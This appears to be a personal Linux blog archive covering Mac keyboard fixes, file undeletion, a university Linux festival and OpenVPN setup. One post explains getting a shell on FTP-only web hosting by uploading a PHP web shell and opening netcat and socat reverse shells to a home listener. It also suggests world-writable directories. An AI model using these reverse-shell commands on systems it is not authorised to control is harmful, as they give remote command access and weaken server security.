Posts Tagged ‘RootShell’

Keyboard function keys behave differently on operating systems other than MacOSX. Soon after you install Ubuntu on your Macbook, you’ll notice various problems, from the default function key behavior (which requires holding the Fn key) to an extremely slow touch-pad. Most of these issues and their solutions are described on the Ubuntu Macbook wiki page, but recent kernels have changed in ways that the parameters described around the net no longer cover. The old way of fixing the keyboard was to pass an option to the kernel’s Human Interface Device (HID) module to switch the function key mode. For example, you might add the following contents to /etc/modprobe.d/functions.conf :

options hid pb_fnmode=2

Replace hid with usbhid for kernels older than 2.6.20. But neither of these worked for my Ubuntu 10.04 Lucid running a 2.6.32 kernel. In recent kernels, Apple HIDs have a separate kernel module named hid-apple, and the parameter has been renamed to fnmode. Knowing these changes, I tried to set the fnmode parameter via modprobe just like before, but failed. So to fix the keyboard issue I used the /sys/ interface to change the fnmode parameter of the hid_apple module :

root@Seeb:/home/ali# echo 2 > /sys/module/hid_apple/parameters/fnmode
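If you want to confirm the change took effect, you can read the value back from the same sysfs file (just a sanity check, not required):

cat /sys/module/hid_apple/parameters/fnmode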

Put the echo command in your startup script /etc/rc.local, before the exit command, so that the issue gets fixed automatically on each boot. If you don’t know how to edit the file with root privileges, that’s easy! Press Alt+F2 and type the following command in the Run dialog :

gksudo gedit /etc/rc.local
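After the edit, a minimal /etc/rc.local might look roughly like this (your existing file may contain other lines; the echo line is the only addition):

#!/bin/sh -e
# Switch Apple function keys to F1-F12 by default on every boot
echo 2 > /sys/module/hid_apple/parameters/fnmode
exit 0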

For the touch-pad speed issue, all you need to do is install the gsynaptics package (qsynaptics for KDE folks), open Touchpad Preferences from System > Preferences > Touchpad, and increase the newly shown parameters “Min Speed” and “Max Speed”.
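If the package isn’t already installed, a single command should do it on Ubuntu (assuming the package name is the same in your release):

sudo apt-get install gsynaptics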

Sometimes you purchase a web host and the only thing you have to control it with is an FTP account. For those familiar with unix-like shells, it would be really cool to have an SSH session on your account, but most web hosts don’t offer this option. It makes life much easier for maintaining files and permissions.

The first step is to find out whether your PHP service blocks the functions used to execute a process. I’m talking about the exec, system and popen family of functions. You may write your own test or install a PHP script called “PHP Shell”. PHP Shell receives shell commands through the web browser, executes them, and delivers the output right in the browser window. There are lots of PHP shells out there; I used the one developed by Martin Geisler. Download one of them and upload it using your FTP account.
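Once the shell is uploaded, a quick sanity check might be to run the two commands below through it: if the first prints your user id, process execution works at all, and the second (assuming the php command-line binary exists on the host) shows which functions, if any, are blocked:

id
php -r 'echo ini_get("disable_functions"), "\n";'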

For simple operations, you can get an interactive shell using GNU netcat (note the word GNU; there are lots of other versions and most of them do not support executing commands). If you run the following command on your machine, it creates a simple TCP listener on a specific port :

netcat -l -p 8999 -v

As you see, we have provided the verbose option to get notified when someone connects to the listener. Then, by running the following line, we can simply connect from the PHP shell to our local listener and get a shell :

netcat my.pc.ip.address 8999 -e "/bin/bash -i"

The above netcat command will connect to your PC at home and execute an interactive bash shell. At this stage you can type commands and see their output (I call it semi-interactive). But you’ll soon notice that special terminal keys such as Ctrl+D, Ctrl+C and the arrow keys don’t work as expected.

We’ll use socat to overcome this problem. socat can connect almost any two streams you can find: files to sockets, terminals to UDP connections, process output to TCP connections, and it supports SSL connections too. But it is not installed on most distributions by default, so the first step is to get the source and compile it. We need it both on our local PC and on the web server. The PC part is easy, but for the web server side you should first find out whether the build tools (compiler, make, etc.) are installed there. Test it simply by running g++ and make in your PHP shell. If they are, follow these steps to get it running :

  1. run wget
  2. extract the file using tar -xf socat-
  3. cd socat-1.7.13
  4. ./configure
  5. make

If everything went smoothly, you will have the socat binary right under the socat-1.7.13 folder. Note that if your web host doesn’t have the build tools installed, you should compile the package locally and upload the binary file. The final part is to set up the listener, this time using socat, and connect to it from the web host. Run the following command to get the listener :

socat file:`tty`,raw,echo=0 tcp-listen:8999

and run this one from the PHP shell to get the terminal :

./socat tcp-connect:my.pc.ip.address:8999 exec:'bash -li',pty,stderr,setsid,sigint,sane

The first socat command connects your current TTY to a listening TCP socket, and the second one connects a bash process to that listener. Now you have a fully functional TTY terminal connected to your account on the web host. Almost all terminal commands work and you can run vim, nano, screen and Midnight Commander 😎 . There are a few differences between an SSH session and this reverse shell. The most important ones are :

  1. Your session is not encrypted; you may use the SSL capabilities of socat (see the sketch after this list).
  2. SSH automatically forwards some useful shell variables; you may set them yourself or put them in the .bash_profile or .bashrc of the web hosting account, such as
    export TERM="xterm-color"
  • For simplicity, you may put the second socat command line in a new PHP script to avoid using the PHP shell each time. Note that you should either secure your PHP shell or delete it when everything is finished, to prevent others from accessing your account.
  • Some web servers run under a different user id than your account. This can mean you don’t have permission to create and edit files using the PHP shell. In such situations, creating a world-writable directory (enable all permissions for all) does the job.
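On the encryption point, socat can wrap the same trick in SSL. A rough sketch, assuming you first generate a self-signed certificate on your own PC (the file names are placeholders, and the port is reused from the examples above):

openssl req -x509 -newkey rsa:2048 -nodes -keyout shell.key -out shell.crt -days 30 -subj "/CN=reverse-shell"
cat shell.key shell.crt > shell.pem
socat file:`tty`,raw,echo=0 openssl-listen:8999,cert=shell.pem,verify=0

and on the web-host side, connect with the matching openssl-connect address instead of tcp-connect:

./socat openssl-connect:my.pc.ip.address:8999,verify=0 exec:'bash -li',pty,stderr,setsid,sigint,sane

verify=0 skips certificate verification on both ends, which is tolerable here only because it is your own ad-hoc tunnel.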

I just pressed the Enter key on a file delete confirmation dialog and removed the code I had been working on for 3 hours. In fact I had made such a mistake before and got no results searching for “Ext3 Recovery / Ext4 Recovery …”. But this time, a new project named extundelete appeared, which claims to extract file metadata from the file-system’s journal.

I tried to extract and compile it by just typing “make” and found that the ext2fs library was missing, so I installed the ext2fs-dev package using the following command (I’m using Ubuntu 9.10) :

sudo apt-get install ext2fs-dev

Then typing “make” in the src folder gives you a binary named “extundelete”. You can run it like this :

ali@Velocity:~/tmp/extundelete-0.1.8/src$ ./extundelete
No action specified; implying --superblock.

Usage: ./extundelete [options] [--] device-file

--version, -[vV]       Print version and exit successfully.
--help,                Print this help and exit successfully.
--superblock           Print contents of superblock in addition to the rest.
                       If no action is specified then this option is implied.
--journal              Show content of journal.
--after dtime          Only process entries deleted on or after 'dtime'.
--before dtime         Only process entries deleted before 'dtime'.

--inode ino            Show info on inode 'ino'.
--block blk            Show info on block 'blk'.

--restore-inode ino     Restore the file(s) with known inode number 'ino'.
                        The restored files are created in ./RESTORED_FILES
                        with their inode number as extension (ie, inode.12345).

--restore-file 'path'  Will restore file 'path'. 'path' is relative to root of
                      the partition and does not start with a '/'
                      (it must be one of the paths returned by --dump-names).
                      The restored file is created in the current directory
                      as 'RECOVERED_FILES/path'.

--restore-files 'path'    Will restore files which are listed in the file 'path'.
                    Each filename should be in the same format as
                    an option to --restore-file, and there should be one per line.

--restore-all          Attempts to restore everything.
-j journal             Reads an external journal from the named file.
-b blocknumber         Uses the backup superblock at blocknumber when
                                opening the file system.
-B blocksize           Uses blocksize as the block size when opening fs.
                       The number should be the number of bytes.

It seems that running the program with --restore-all should restore all possible files, like this :

ali@Velocity$ ./extundelete /dev/sda6 --restore-all

But that option only gave me some temporary, hidden, and otherwise useless config files from my home folder. I was thinking of rewriting the code …

Suddenly I found that extundelete supports another option in which you can specify the inode number of your file, and it will bring it back … 🙂

Looking at the manual of the “ls” command, you’ll find that running “ls” with the -i parameter gives you the inode number of each file in a directory. I tried to find a range of inode numbers around the deleted file and search for all files in that range …

ali@Velocity:~/projects/Monko-MovieQuiz/Source/IMDBot/src$ ls -i
7824227 artists.db
7824214 movies-merged.db
7824219 movies-vahid.db
7824254 movies-sohrab.db
7864492 tests
7864514 cache
7824208 MovieDatabase.pyc
7824207 movies-soroush.db
7962711 Tools

It seems that most of the files are in the 7824xxx range, so searching from 7824000 to 7824999 might be a good idea (take a look at the following bash code snippet) :

for ((i=7824000; i<=7824999; i++)); do
    ./extundelete /dev/sda6 --restore-inode $i
done

Viva!

I got 7 deleted files in this range (inside the RECOVERED_FILES directory), and one of them was my deleted Python code! And I spent my time writing this article instead of rewriting the code 😉

Second Linux Festival - AUT

The second Linux Festival has been successfully held at Amirkabir University of Technology (AKA Polytechnic). It was divided into three main levels: Beginner, Intermediate and Advanced. The topics were presented in the Computer Site of the CEIT department with much better quality than last year’s festival. People installed, tried out, and put to use a new operating system in a well-organized way. During the installation process and most of the other presentations, our local server and mirror of software packages (aka SSCLinuxBox) helped a lot and became the standard way of sharing files and installing software during the festival.

Topics and Schedule

One month ago, when we were planning the festival topics and schedule, Amir-Mohammad and I reviewed many Linux-related books and their contents. This resulted in a rich outline for the festival topics. Judging by the topics and presentation quality, this was the first festival in Iran to cover such a scope of topics, and the best so far. Here’s a summary of the main subjects and presentations :

  • Beginner (1st Day)
    • Linux W5H2 ?
    • Distributions
    • Installing Ubuntu Linux
    • Package Management
    • Linux File System Structure
    • Desktop Environments
    • Useful Programs
  • Intermediate (2nd Day)
    • System Configuration
    • Introduction to command line
    • Linux and Network
    • Web Development in Linux
    • Installing software from source
    • GUI Development Using QT
  • Advanced (3rd Day)
    • Boot-up Process
    • Network concepts in Linux
    • Linux Servers
    • Scripting in Linux (Bash, Python, …)
    • The Linux Kernel
    • Linux Security

The complete program and schedule can be found here.

What I learned

Although this was our university’s second Linux Festival and we had fixed almost all of the problems seen in the previous one, there are always problems, and we can learn from them. One of the main points I noticed in the first few presentations was the importance of coordination between presenters about the topics and details to be presented. The lack of such coordination before the festival caused problems with presentation topics and contents, since some presenters had a different idea of the listeners’ level and prepared extra material for beginners. In addition, none of us knew about the dependencies of the subject being presented, or whether they had already been discussed.

Yet another point on the art of presentation and teaching: in situations like this, where every presenter is a professional in a field, likes the topic and has chosen to teach it, hiding the unnecessary details is a very hard task. A teacher should be able to put themselves in the listeners’ place, simulate their thinking process, and remove the details that might break it. On the other hand, they should analyze the dependencies of the current topic and explain them before anything else.

I got a lot of feedback on the presentation style and found that estimating the listeners’ level and correctly decomposing the subject into its simplest form are the keys to a successful presentation.


It was a cool and friendly atmosphere. The support team and the technical team were both working hard to reach the best quality, and that made it a real memory. It’s notable that this was the first serious project of our new Scientific Committee, and the results were incredible.



Narcis For Linux - Revision 3 - Screenshot

I’ve been playing around with a full-featured English-Persian dictionary named Narcis. Narcis was provided as a Windows application and, AFAIK, its development has stopped. I found it useful to have its rich database, so I wrote some Python scripts to decode the character set and export it into C++ source code format. Now I’m writing my Linux port using Qt, C++ and SQLite :). For more information on the project, refer to the N4L wiki page.

In fact, the worst thing about upgrading your operating system is that there are always features that you miss in the new one, or that get broken by mistake! I was using Ubuntu 8.10, and when I upgraded to 9.04 I realized that the Intel driver included in that release was in beta and its performance was really poor. So I downgraded to 8.10, and then with the release of 9.10 (Karmic) my VPN and OpenVPN configurations in Network Manager stopped working.

I decided to stick with the shell again and connect using my OpenVPN configuration with a simple openvpn command.

It is as simple as running a single command: first switch to the directory where your config files live and type :

sudo openvpn --config myclient.conf
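For reference, a minimal client config file passed with --config looks roughly like the sketch below; the remote host name and the certificate/key file names are placeholders, and your provider’s real file will differ:

client
dev tun
proto udp
remote vpn.example.com 1194
ca ca.crt
cert client.crt
key client.key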

Two weeks ago I upgraded my Windows XP SP3 to Windows 7 and, guess what, the openvpn-gui package wasn’t working either.

Taking a look at the OpenVPN log, I found that it had routing problems with the following error and couldn’t set the routes, so the Windows network applet reported “No Internet access”.

ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct.

It seems that some of the forwarding structures and APIs have changed since Vista, and OpenVPN version 2.0.9 is not aware of them. After googling around, I found that the latest official OpenVPN release has fixed these issues, and it is interesting that they’ve included the Windows GUI in the official release. You can download version 2.1.1 from the official OpenVPN site.

Take care: you should set it to “Windows Vista” compatibility mode and run it as administrator.

After installation, copy your config files into C:\Program Files\OpenVPN\config\ and run OpenVPN GUI from the Start menu. If you run into routing problems again, try running the OpenVPN GUI as administrator too.